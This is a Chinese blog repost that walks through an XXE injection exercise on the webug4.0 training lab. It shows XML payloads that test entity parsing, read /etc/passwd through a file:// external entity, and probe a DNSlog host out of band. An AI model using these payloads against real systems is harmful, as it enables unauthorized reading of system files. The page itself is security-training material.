我是靠谱客的博主 高贵台灯,最近开发中收集的这篇文章主要介绍webug4.0之xxe注入,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

关于xxe漏洞,传送门 -》xxe漏洞详解

1. 页面观察

让我们登录,我们随便输入一个字符如admin,观察页面,出现了xml有关的东西,我们就要怀疑存在xml注入

2. 看是否能解析xml数据

这里我们使用burpsuite截取数据包,更好的观察。将以下的测试语句提交到输入框中,如果程序能输出 “my name is nMask”则说明能都解析xml数据


    
    
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE root [
  3. <!ENTITY name "my name is nMask">]>
  4. <root> &name; </root>

其对我们的输入的语句进行了URL编码,且程序正确解析了xml数据

2. 读取文件

利用file协议读取/etc/passwd文件,使用burp提交的话需要URL编码


    
    
  1. <?xml version="1.0" encoding="gb2312"?>
  2. <!DOCTYPE a [
  3. <!ENTITY test SYSTEM "file:///etc/passwd">
  4. ]>
  5. <a> &test; </a>

以上是有回显我们才能看到文件被读取才知道存在xxe漏洞,那假如没有回显了,我们可以使用dnslog来探测是否存在xxe漏洞

3. dnslog探测是否存在xxe漏洞


    
    
  1. <?xml version="1.0" encoding="gb2312"?>
  2. <!DOCTYPE a [
  3. <!ENTITY xhh SYSTEM "http://r4p4om.dnslog.cn">
  4. ]>
  5. <a> &xhh; </a>

说明存在漏洞

 

最后

以上就是高贵台灯为你收集整理的webug4.0之xxe注入的全部内容,希望文章能够帮你解决webug4.0之xxe注入所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(32)

评论列表共有 0 条评论

立即
投稿
返回
顶部